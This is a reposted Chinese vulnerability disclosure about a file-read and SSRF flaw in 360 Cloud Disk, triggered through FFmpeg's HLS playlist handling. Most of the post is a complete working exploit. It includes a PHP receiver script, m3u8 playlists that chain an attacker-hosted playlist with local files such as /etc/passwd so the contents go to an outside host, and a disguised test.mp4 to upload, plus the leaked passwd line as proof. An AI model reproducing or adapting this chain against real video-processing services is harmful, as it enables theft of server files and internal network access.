神刀安全网

漏洞标题: 360云盘文件读取/SSRF

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

360云盘文件读取/SSRF

详细说明:

看了大神文章:

code 区域
https://hackerone.com/reports/115857
https://habrahabr.ru/company/mailru/blog/274855/

好像是FFmpeg分段读取的问题,然后自己动手测试.

一共4个文件:

comm.php (接收用的 也可以用监听一个端口)

code 区域
<?php
file_put_contents(time()."_test.txt",$_GET['x']);
?>

header.m3u8 (视频格式文件)

code 区域
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.u-url.org/exp/movie/comm.php?x=

remote.m3u8 (第二次转发的)

code 区域
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com
#EXT-X-ENDLIST

code 区域
http://baidu.com  也可以换成 本地资源文件: /etc/passwd

test.mp4 (最终上传触发)

code 区域
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.u-url.org/exp/movie/remote.m3u8
#EXT-X-ENDLIST

漏洞证明:

一切准备号了之后就上传test.mp4到360云盘上去。

漏洞标题:  360云盘文件读取/SSRF

code 区域
root:x:0:0:root:/root:/bin/bash

也可以ssrf

修复方案:

版权声明:转载请注明来源 Noxxx@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 360云盘文件读取/SSRF

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址